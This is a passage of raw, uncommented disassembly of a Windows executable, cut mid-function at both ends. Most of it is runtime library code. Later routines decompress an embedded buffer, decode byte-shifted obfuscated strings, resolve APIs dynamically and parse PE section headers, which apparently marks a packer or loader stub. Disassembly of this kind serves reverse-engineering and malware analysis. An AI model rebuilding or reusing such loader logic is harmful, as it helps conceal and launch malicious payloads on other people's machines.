jz short locret_401853
mov ecx, [eax]
test ecx, ecx
jz sub_401734
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, [ecx-4]
mov edx, [esi-4]
add edx, edi
cmp esi, ecx
jz short loc_401848
call sub_401A20
mov eax, esi
mov ecx, [esi-4]
loc_40183B: ; CODE XREF: sub_401810+41�j
mov edx, [ebx]
add edx, edi
call sub_4011B4
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401848: ; CODE XREF: sub_401810+1F�j
call sub_401A20
mov eax, [ebx]
mov ecx, edi
jmp short loc_40183B
; ---------------------------------------------------------------------------
locret_401853: ; CODE XREF: sub_401810+2�j
retn
sub_401810 endp
; =============== S U B R O U T I N E =======================================
sub_401854 proc near ; CODE XREF: sub_4036BC+55�p
; sub_403EB5+E0�p
push ebx
push esi
push edi
push edx
push eax
mov ebx, edx
xor edi, edi
mov ecx, [esp+edx*4+14h]
test ecx, ecx
jz short loc_40186B
cmp [eax], ecx
jnz short loc_40186B
mov edi, eax
loc_40186B: ; CODE XREF: sub_401854+F�j
; sub_401854+13�j
xor eax, eax
loc_40186D: ; CODE XREF: sub_401854+2B�j
mov ecx, [esp+edx*4+14h]
test ecx, ecx
jz short loc_40187E
add eax, [ecx-4]
cmp edi, ecx
jnz short loc_40187E
xor edi, edi
loc_40187E: ; CODE XREF: sub_401854+1F�j
; sub_401854+26�j
dec edx
jnz short loc_40186D
test edi, edi
jz short loc_401899
mov edx, eax
mov eax, edi
mov esi, [edi]
mov esi, [esi-4]
call sub_401A20
push edi
add esi, [edi]
dec ebx
jmp short loc_4018A1
; ---------------------------------------------------------------------------
loc_401899: ; CODE XREF: sub_401854+2F�j
call sub_401778
push eax
mov esi, eax
loc_4018A1: ; CODE XREF: sub_401854+43�j
; sub_401854+62�j
mov eax, [esp+ebx*4+18h]
mov edx, esi
test eax, eax
jz short loc_4018B5
mov ecx, [eax-4]
add esi, ecx
call sub_4011B4
loc_4018B5: ; CODE XREF: sub_401854+55�j
dec ebx
jnz short loc_4018A1
pop edx
pop eax
test edi, edi
jnz short loc_4018CA
test edx, edx
jz short loc_4018C5
dec dword ptr [edx-8]
loc_4018C5: ; CODE XREF: sub_401854+6C�j
call sub_401734
loc_4018CA: ; CODE XREF: sub_401854+68�j
pop edx
pop edi
pop esi
pop ebx
pop eax
lea esp, [esp+edx*4]
jmp eax
sub_401854 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4018D8 proc near ; CODE XREF: sub_403990+8B�p
; sub_403990+CA�p
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
cmp eax, edx
jz loc_401976
test esi, esi
jz short loc_401953
test edi, edi
jz short loc_40195A
mov eax, [esi-4]
mov edx, [edi-4]
sub eax, edx
ja short loc_4018FB
add edx, eax
loc_4018FB: ; CODE XREF: sub_4018D8+1F�j
push edx
shr edx, 2
jz short loc_401927
loc_401901: ; CODE XREF: sub_4018D8+45�j
mov ecx, [esi]
mov ebx, [edi]
cmp ecx, ebx
jnz short loc_401961
dec edx
jz short loc_401921
mov ecx, [esi+4]
mov ebx, [edi+4]
cmp ecx, ebx
jnz short loc_401961
add esi, 8
add edi, 8
dec edx
jnz short loc_401901
jmp short loc_401927
; ---------------------------------------------------------------------------
loc_401921: ; CODE XREF: sub_4018D8+32�j
add esi, 4
add edi, 4
loc_401927: ; CODE XREF: sub_4018D8+27�j
; sub_4018D8+47�j
pop edx
and edx, 3
jz short loc_40194F
mov ecx, [esi]
mov ebx, [edi]
cmp cl, bl
jnz short loc_401976
dec edx
jz short loc_40194F
cmp ch, bh
jnz short loc_401976
dec edx
jz short loc_40194F
and ebx, 0FF0000h
and ecx, 0FF0000h
cmp ecx, ebx
jnz short loc_401976
loc_40194F: ; CODE XREF: sub_4018D8+53�j
; sub_4018D8+5E�j ...
add eax, eax
jmp short loc_401976
; ---------------------------------------------------------------------------
loc_401953: ; CODE XREF: sub_4018D8+11�j
mov edx, [edi-4]
sub eax, edx
jmp short loc_401976
; ---------------------------------------------------------------------------
loc_40195A: ; CODE XREF: sub_4018D8+15�j
mov eax, [esi-4]
sub eax, edx
jmp short loc_401976
; ---------------------------------------------------------------------------
loc_401961: ; CODE XREF: sub_4018D8+2F�j
; sub_4018D8+3C�j
pop edx
cmp cl, bl
jnz short loc_401976
cmp ch, bh
jnz short loc_401976
shr ecx, 10h
shr ebx, 10h
cmp cl, bl
jnz short loc_401976
cmp ch, bh
loc_401976: ; CODE XREF: sub_4018D8+9�j
; sub_4018D8+5B�j ...
pop edi
pop esi
pop ebx
retn
sub_4018D8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40197C proc near ; CODE XREF: sub_401D4C+F�p
; sub_401E0C+14�p ...
test eax, eax
jz short locret_401989
mov edx, [eax-8]
inc edx
jle short locret_401989
inc dword ptr [eax-8]
locret_401989: ; CODE XREF: sub_40197C+2�j
; sub_40197C+8�j
retn
sub_40197C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40198C proc near ; CODE XREF: sub_401FF4+51�p
; sub_401FF4+75�p ...
test eax, eax
jz short loc_401992
retn
; ---------------------------------------------------------------------------
byte_401991 db 0 ; DATA XREF: sub_40198C:loc_401992�o
; ---------------------------------------------------------------------------
loc_401992: ; CODE XREF: sub_40198C+2�j
mov eax, offset byte_401991
retn
sub_40198C endp
; =============== S U B R O U T I N E =======================================
sub_401998 proc near ; CODE XREF: sub_4019D8�j
mov edx, [eax]
test edx, edx
jz short loc_4019D5
mov ecx, [edx-8]
dec ecx
jz short loc_4019D5
push ebx
mov ebx, eax
mov eax, [edx-4]
call sub_401778
mov edx, eax
mov eax, [ebx]
mov [ebx], edx
push eax
mov ecx, [eax-4]
call sub_4011B4
pop eax
mov ecx, [eax-8]
dec ecx
jl short loc_4019D2
dec dword ptr [eax-8]
jnz short loc_4019D2
lea eax, [eax-8]
call sub_4010E8
loc_4019D2: ; CODE XREF: sub_401998+2B�j
; sub_401998+30�j
mov edx, [ebx]
pop ebx
loc_4019D5: ; CODE XREF: sub_401998+4�j
; sub_401998+A�j
mov eax, edx
retn
sub_401998 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4019D8 proc near ; CODE XREF: sub_401D4C+34�p
; sub_401D4C+67�p ...
jmp sub_401998
sub_4019D8 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4019E0 proc near ; CODE XREF: sub_403990+7B�p
; sub_403990+BA�p
arg_0 = dword ptr 4
push ebx
test eax, eax
jz short loc_401A12
mov ebx, [eax-4]
test ebx, ebx
jz short loc_401A12
dec edx
jl short loc_401A0A
cmp edx, ebx
jge short loc_401A12
loc_4019F3: ; CODE XREF: sub_4019E0+2C�j
sub ebx, edx
test ecx, ecx
jl short loc_401A12
cmp ecx, ebx
jg short loc_401A0E
loc_4019FD: ; CODE XREF: sub_4019E0+30�j
add edx, eax
mov eax, [esp+4+arg_0]
call sub_4017A4
jmp short loc_401A1B
; ---------------------------------------------------------------------------
loc_401A0A: ; CODE XREF: sub_4019E0+D�j
xor edx, edx
jmp short loc_4019F3
; ---------------------------------------------------------------------------
loc_401A0E: ; CODE XREF: sub_4019E0+1B�j
mov ecx, ebx
jmp short loc_4019FD
; ---------------------------------------------------------------------------
loc_401A12: ; CODE XREF: sub_4019E0+3�j
; sub_4019E0+A�j ...
mov eax, [esp+4+arg_0]
call sub_4016E0
loc_401A1B: ; CODE XREF: sub_4019E0+28�j
pop ebx
retn 4
sub_4019E0 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401A20 proc near ; CODE XREF: sub_401214+7F�p
; sub_401810+21�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jle short loc_401A75
mov eax, [ebx]
test eax, eax
jz short loc_401A56
cmp dword ptr [eax-8], 1
jnz short loc_401A56
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_401100
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [esi+eax], 0
jmp short loc_401A7E
; ---------------------------------------------------------------------------
loc_401A56: ; CODE XREF: sub_401A20+11�j
; sub_401A20+17�j
mov eax, edx
call sub_401778
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_401A75
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_401A70
mov ecx, esi
loc_401A70: ; CODE XREF: sub_401A20+4C�j
call sub_4011B4
loc_401A75: ; CODE XREF: sub_401A20+B�j
; sub_401A20+43�j
mov eax, ebx
call sub_4016E0
mov [ebx], edi
loc_401A7E: ; CODE XREF: sub_401A20+34�j
pop edi
pop esi
pop ebx
retn
sub_401A20 endp
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_401A88 proc near ; CODE XREF: CODE:00401A9F�p
; DATA XREF: sub_401AA8:loc_401AAF�o
mov al, 10h
jmp loc_4011A8
sub_401A88 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_401A90: ; DATA XREF: sub_401AA8+14�o
mov ax, [eax]
sub ax, 2
jb short locret_401AA4
sub ax, 8
jz short locret_401AA4
call sub_401A88
locret_401AA4: ; CODE XREF: CODE:00401A97�j
; CODE:00401A9D�j
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401AA8 proc near ; CODE XREF: CODE:00401B65�p
mov edx, offset dword_40605C
xor eax, eax
loc_401AAF: ; CODE XREF: sub_401AA8+12�j
mov dword ptr [edx+eax*4], offset sub_401A88
inc eax
cmp eax, 2Bh
jnz short loc_401AAF
mov eax, offset loc_401A90
mov ds:dword_40605C, eax
retn
sub_401AA8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401AC8 proc near ; DATA XREF: CODE:00401B5B�o
mov al, 11h
jmp loc_4011A8
sub_401AC8 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401AD0 proc near ; CODE XREF: sub_401C10+5�p
mov edx, ds:dword_40500C
mov [eax], edx
mov ds:dword_40500C, eax
retn
sub_401AD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401AE0 proc near ; CODE XREF: sub_4015F8+66�p
; DATA XREF: DATA:off_405014�o
push ebx
push esi
mov esi, eax
mov ebx, ds:dword_405010
test ebx, ebx
jz short loc_401AFA
loc_401AEE: ; CODE XREF: sub_401AE0+18�j
mov eax, [esi+4]
call dword ptr [ebx+4]
mov ebx, [ebx]
test ebx, ebx
jnz short loc_401AEE
loc_401AFA: ; CODE XREF: sub_401AE0+C�j
pop esi
pop ebx
retn
sub_401AE0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_401B3C
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_406024
jnz short loc_401B2E
cmp ds:dword_406058, 0
jz short loc_401B28
call ds:dword_406058
loc_401B28: ; CODE XREF: CODE:00401B20�j
call ds:off_405024
loc_401B2E: ; CODE XREF: CODE:00401B17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401B43
loc_401B3B: ; CODE XREF: CODE:00401B41�j
retn
; ---------------------------------------------------------------------------
loc_401B3C: ; DATA XREF: CODE:00401B06�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_401B3B
; ---------------------------------------------------------------------------
loc_401B43: ; CODE XREF: CODE:loc_401B3B�j
; DATA XREF: CODE:00401B36�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_406024, 1
jnb short locret_401B74
call GetProcessHeap
mov ds:hHeap, eax
mov ds:dword_406000, offset sub_401AC8
call sub_401AA8
call GetCurrentThreadId
mov ds:dword_406018, eax
locret_401B74: ; CODE XREF: CODE:00401B4F�j
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401B78 proc near ; CODE XREF: sub_401B8C+21�p
push eax ; uBytes
push 40h ; uFlags
call LocalAlloc
retn
sub_401B78 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401B84 proc near ; CODE XREF: sub_401B8C+1�p
mov eax, 4
retn
sub_401B84 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401B8C proc near ; CODE XREF: sub_401BD0:loc_401BEA�p
push ebx
call sub_401B84
mov ebx, eax
test ebx, ebx
jz short loc_401BCE
cmp ds:TlsIndex, 0FFFFFFFFh
jnz short loc_401BAB
mov eax, 0E2h
call sub_4016D4
; ---------------------------------------------------------------------------
loc_401BAB: ; CODE XREF: sub_401B8C+13�j
mov eax, ebx
call sub_401B78
test eax, eax
jnz short loc_401BC2
mov eax, 0E2h
call sub_4016D4
; ---------------------------------------------------------------------------
jmp short loc_401BCE
; ---------------------------------------------------------------------------
loc_401BC2: ; CODE XREF: sub_401B8C+28�j
push eax ; lpTlsValue
mov eax, ds:TlsIndex
push eax ; dwTlsIndex
call TlsSetValue
loc_401BCE: ; CODE XREF: sub_401B8C+A�j
; sub_401B8C+34�j
pop ebx
retn
sub_401B8C endp
; =============== S U B R O U T I N E =======================================
sub_401BD0 proc near ; CODE XREF: sub_40115C+20�p
mov cl, ds:byte_406108
mov eax, ds:TlsIndex
test cl, cl
jnz short loc_401C05
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_401BEA: ; CODE XREF: sub_401BD0+3D�j
call sub_401B8C
mov eax, ds:TlsIndex
push eax ; dwTlsIndex
call TlsGetValue
test eax, eax
jz short loc_401BFF
retn
; ---------------------------------------------------------------------------
loc_401BFF: ; CODE XREF: sub_401BD0+2C�j
mov eax, ds:dword_40611C
retn
; ---------------------------------------------------------------------------
loc_401C05: ; CODE XREF: sub_401BD0+D�j
push eax ; dwTlsIndex
call TlsGetValue
test eax, eax
jz short loc_401BEA
retn
sub_401BD0 endp
; =============== S U B R O U T I N E =======================================
sub_401C10 proc near ; CODE XREF: sub_401C1C+2E�p
mov eax, offset dword_405058
call sub_401AD0
retn
sub_401C10 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401C1C proc near ; CODE XREF: start+14�p
push ebx
mov ebx, eax
xor eax, eax
mov ds:TlsIndex, eax
push 0 ; lpModuleName
call GetModuleHandleA
mov ds:dword_406114, eax
mov eax, ds:dword_406114
mov ds:dword_40505C, eax
xor eax, eax
mov ds:dword_405060, eax
xor eax, eax
mov ds:dword_405064, eax
call sub_401C10
mov edx, offset dword_405058
mov eax, ebx
call sub_40158C
pop ebx
retn
sub_401C1C endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_401C85
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_406118
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401C8C
loc_401C84: ; CODE XREF: CODE:00401C8A�j
retn
; ---------------------------------------------------------------------------
loc_401C85: ; DATA XREF: CODE:00401C66�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_401C84
; ---------------------------------------------------------------------------
loc_401C8C: ; CODE XREF: CODE:loc_401C84�j
; DATA XREF: CODE:00401C7F�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub ds:dword_406118, 1
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_401CBD
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_406120
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401CC4
loc_401CBC: ; CODE XREF: CODE:00401CC2�j
retn
; ---------------------------------------------------------------------------
loc_401CBD: ; DATA XREF: CODE:00401C9E�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_401CBC
; ---------------------------------------------------------------------------
loc_401CC4: ; CODE XREF: CODE:loc_401CBC�j
; DATA XREF: CODE:00401CB7�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_406120, 1
retn
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess_0. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA_0. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetProcAddress. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION LoadLibraryA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_401D25
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_406124
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401D2C
loc_401D24: ; CODE XREF: CODE:00401D2A�j
retn
; ---------------------------------------------------------------------------
loc_401D25: ; DATA XREF: CODE:00401D06�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_401D24
; ---------------------------------------------------------------------------
loc_401D2C: ; CODE XREF: CODE:loc_401D24�j
; DATA XREF: CODE:00401D1F�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub ds:dword_406124, 1
retn
; [00000006 BYTES: COLLAPSED FUNCTION RtlDecompressBuffer. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D40 proc near ; CODE XREF: sub_401D4C+25�p
; sub_401E0C+31�p ...
test eax, eax
jz short locret_401D49
sub eax, 4
mov eax, [eax]
locret_401D49: ; CODE XREF: sub_401D40+2�j
retn
sub_401D40 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D4C proc near ; CODE XREF: sub_403EB5+168�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
call sub_40197C
xor eax, eax
push ebp
push offset loc_401DF9
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+arg_4]
call sub_401D40
mov ebx, eax
cmp ebx, 4
jbe short loc_401DDC
lea eax, [ebp+arg_4]
call sub_4019D8
mov edi, eax
mov edx, [edi]
mov eax, esi
call sub_401A20
cmp dword ptr [edi], 80000h
jbe short loc_401DA1
mov [ebp+var_8], 2
jmp short loc_401DA8
; ---------------------------------------------------------------------------
loc_401DA1: ; CODE XREF: sub_401D4C+4A�j
mov [ebp+var_8], 102h
loc_401DA8: ; CODE XREF: sub_401D4C+53�j
lea eax, [ebp+var_4]
push eax
sub ebx, 4
push ebx
lea eax, [ebp+arg_4]
call sub_4019D8
add eax, 4
push eax
mov eax, [edi]
push eax
mov eax, esi
call sub_4019D8
push eax
mov eax, [ebp+var_8]
push eax
call RtlDecompressBuffer
mov eax, esi
mov edx, [ebp+var_4]
call sub_401A20
jmp short loc_401DE3
; ---------------------------------------------------------------------------
loc_401DDC: ; CODE XREF: sub_401D4C+2F�j
mov eax, esi
call sub_4016E0
loc_401DE3: ; CODE XREF: sub_401D4C+8E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401E00
loc_401DF0: ; CODE XREF: sub_401D4C+B2�j
lea eax, [ebp+arg_4]
call sub_4016E0
retn
; ---------------------------------------------------------------------------
loc_401DF9: ; DATA XREF: sub_401D4C+17�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_401DF0
; ---------------------------------------------------------------------------
loc_401E00: ; CODE XREF: sub_401D4C+AC�j
; DATA XREF: sub_401D4C+9F�o
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 8
sub_401D4C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E0C proc near ; CODE XREF: sub_403EB5+175�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
xor eax, eax
mov [ebp+var_C], eax
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
call sub_40197C
xor eax, eax
push ebp
push offset loc_401ECF
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, esi
call sub_4016E0
mov eax, [ebp+arg_4]
call sub_401D40
mov [ebp+var_8], eax
mov ebx, 1
cmp ebx, [ebp+var_8]
ja short loc_401EB1
loc_401E4F: ; CODE XREF: sub_401E0C+A3�j
mov eax, [ebp+arg_4]
mov al, [eax+ebx-1]
test al, al
jnz short loc_401E92
mov eax, [ebp+arg_4]
mov al, [eax+ebx]
mov [ebp+var_1], al
mov eax, [esi]
call sub_401D40
mov edi, eax
xor edx, edx
mov dl, [ebp+var_1]
add edx, edi
mov eax, esi
call sub_401A20
mov eax, esi
call sub_4019D8
add eax, edi
xor edx, edx
mov dl, [ebp+var_1]
xor ecx, ecx
call sub_4013DC
inc ebx
jmp short loc_401EAB
; ---------------------------------------------------------------------------
loc_401E92: ; CODE XREF: sub_401E0C+4C�j
lea eax, [ebp+var_C]
mov edx, [ebp+arg_4]
mov dl, [edx+ebx-1]
call sub_4017D4
mov edx, [ebp+var_C]
mov eax, esi
call sub_401810
loc_401EAB: ; CODE XREF: sub_401E0C+84�j
inc ebx
cmp ebx, [ebp+var_8]
jbe short loc_401E4F
loc_401EB1: ; CODE XREF: sub_401E0C+41�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401ED6
loc_401EBE: ; CODE XREF: sub_401E0C+C8�j
lea eax, [ebp+var_C]
call sub_4016E0
lea eax, [ebp+arg_4]
call sub_4016E0
retn
; ---------------------------------------------------------------------------
loc_401ECF: ; DATA XREF: sub_401E0C+1C�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_401EBE
; ---------------------------------------------------------------------------
loc_401ED6: ; CODE XREF: sub_401E0C+C2�j
; DATA XREF: sub_401E0C+AD�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_401E0C endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_401F05
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_406128
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401F0C
loc_401F04: ; CODE XREF: CODE:00401F0A�j
retn
; ---------------------------------------------------------------------------
loc_401F05: ; DATA XREF: CODE:00401EE6�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_401F04
; ---------------------------------------------------------------------------
loc_401F0C: ; CODE XREF: CODE:loc_401F04�j
; DATA XREF: CODE:00401EFF�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub ds:dword_406128, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F18 proc near ; CODE XREF: sub_401FF4+362�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, 18h
mov edx, [ebp+var_4]
movzx edx, word ptr [edx+14h]
add eax, edx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
pop ecx
pop ecx
pop ebp
retn
sub_401F18 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F3C proc near ; CODE XREF: sub_401FF4+3D5�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 1Dh
mov eax, ds:dword_405070[eax*4]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
pop ecx
pop ecx
pop ebp
retn
sub_401F3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F5C proc near ; CODE XREF: sub_401FF4+46�p
; sub_401FF4+6A�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
xor ecx, ecx
mov [ebp+var_18], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40197C
xor eax, eax
push ebp
push offset loc_401FE8
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_401808
test eax, eax
jle short loc_401FCA
mov [ebp+var_14], eax
mov [ebp+var_C], 1
loc_401F99: ; CODE XREF: sub_401F5C+6C�j
mov eax, [ebp+var_4]
mov edx, [ebp+var_C]
mov al, [eax+edx-1]
mov [ebp+var_D], al
lea eax, [ebp+var_18]
mov dl, [ebp+var_D]
sub dl, 3Bh
call sub_4017D4
mov edx, [ebp+var_18]
mov eax, [ebp+var_8]
call sub_401810
mov eax, [ebp+var_8]
inc [ebp+var_C]
dec [ebp+var_14]
jnz short loc_401F99
loc_401FCA: ; CODE XREF: sub_401F5C+31�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401FEF
loc_401FD7: ; CODE XREF: sub_401F5C+91�j
lea eax, [ebp+var_18]
call sub_4016E0
lea eax, [ebp+var_4]
call sub_4016E0
retn
; ---------------------------------------------------------------------------
loc_401FE8: ; DATA XREF: sub_401F5C+1C�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_401FD7
; ---------------------------------------------------------------------------
loc_401FEF: ; CODE XREF: sub_401F5C+8B�j
; DATA XREF: sub_401F5C+76�o
mov esp, ebp
pop ebp
retn
sub_401F5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401FF4 proc near ; CODE XREF: sub_403EB5+1A8�p
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
var_E4 = dword ptr -0E4h
var_D8 = dword ptr -0D8h
var_BC = dword ptr -0BCh
var_8C = word ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
hModule = dword ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, 37h
loc_401FFD: ; CODE XREF: sub_401FF4+E�j
push 0
push 0
dec ecx
jnz short loc_401FFD
xchg ecx, [ebp+var_4]
push ebx
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
call sub_40197C
mov eax, [ebp+var_C]
call sub_40197C
xor eax, eax
push ebp
push offset loc_4024A4
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_18C]
mov eax, offset dword_4024C0
call sub_401F5C
mov eax, [ebp+var_18C]
call sub_40198C
push eax ; lpLibFileName
call LoadLibraryA
mov [ebp+hModule], eax
lea edx, [ebp+var_190]
mov eax, offset dword_4024D8
call sub_401F5C
mov eax, [ebp+var_190]
call sub_40198C
push eax ; lpLibFileName
call LoadLibraryA
mov [ebp+var_18], eax
lea edx, [ebp+var_194]
mov eax, offset dword_4024EC
call sub_401F5C
mov eax, [ebp+var_194]
call sub_40198C
push eax ; lpProcName
mov eax, [ebp+hModule]
push eax ; hModule
call GetProcAddress
mov [ebp+var_40], eax
lea edx, [ebp+var_198]
mov eax, offset dword_402504
call sub_401F5C
mov eax, [ebp+var_198]
call sub_40198C
push eax
mov eax, [ebp+hModule]
push eax
call [ebp+var_40]
mov [ebp+var_3C], eax
lea edx, [ebp+var_19C]
mov eax, offset aVappgnaQKipaP ; "‚ ¯£ œŸ~ª©¯ ³¯"
call sub_401F5C
mov eax, [ebp+var_19C]
call sub_40198C
push eax
mov eax, [ebp+hModule]
push eax
